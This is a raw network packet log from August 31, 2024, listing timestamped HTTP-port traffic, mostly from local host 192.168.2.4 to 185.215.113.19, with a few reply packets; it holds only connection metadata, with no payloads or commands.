Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348855972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348867893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348880053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348891020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348901987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348913908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348927021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348938942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348949909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348962069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348973036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348983049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348984003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.348999023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349010944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349021912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349056005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349082947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349109888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349139929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349174023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349199057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349224091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349252939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349273920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349299908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349327087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349351883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349375963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349402905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349432945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349463940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349488020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349518061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349539042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349562883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349591970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349613905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349647045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349663019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349689007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349718094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349741936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349767923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349795103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349824905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349853039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349881887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349910021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349935055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349958897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.349982977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350008965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350033045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350058079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350081921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350110054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350133896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350158930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350188971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350224972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350250959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350277901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350303888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350326061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350354910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350378990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350404978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350431919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350455046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350480080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350507021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350528002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350555897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350584030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350836992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350899935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350920916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350946903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350966930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.350987911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351010084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351031065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351052046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351073027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351089001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351111889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351133108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351154089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351176023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351200104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351228952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351241112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351270914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351291895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351315975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351330996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351356030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351372004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351394892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351414919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351433992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351455927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351485968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351501942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351525068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351552010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351573944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351594925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351610899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351635933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351655960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351670980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351695061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351716042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351735115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351749897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351771116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351808071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351830959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351846933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351870060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351891041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351911068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351929903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351954937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351974010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.351986885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352011919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352030039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352051973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352066994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352092981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352117062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352139950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352164984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352185965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352200985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352227926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352251053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352266073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352287054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352302074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352324963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352349997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352360010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352385998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352402925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352430105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352448940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352473974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352500916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352509975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352535009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352555990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352576017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352597952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352617979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352641106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352652073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352679968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352694035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352715969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352740049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352763891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352787971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352813005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352822065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352848053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352866888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352885962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352905989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352921009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352945089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352962971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.352984905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353002071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353029013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353044033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353070021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353091002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353111982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353271008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353293896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353318930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353336096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353363991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353416920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353430033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353457928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353477955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353499889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353513956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353540897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353558064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353588104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353609085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353622913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353645086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353652954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.353665113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.353666067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353676081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.353681087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353708029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353733063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353751898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353771925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353794098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353816986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353838921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353862047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.353888988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354032993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354051113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354073048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354089975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.354093075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354101896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.354110956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354113102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.354130030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354161978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354177952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354201078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354223013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354244947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354265928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354290009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354312897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354332924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354351044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354372978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354397058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354406118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354429960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354446888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.354468107 CEST	49732	80	192.168.2.4	185.215.113.19
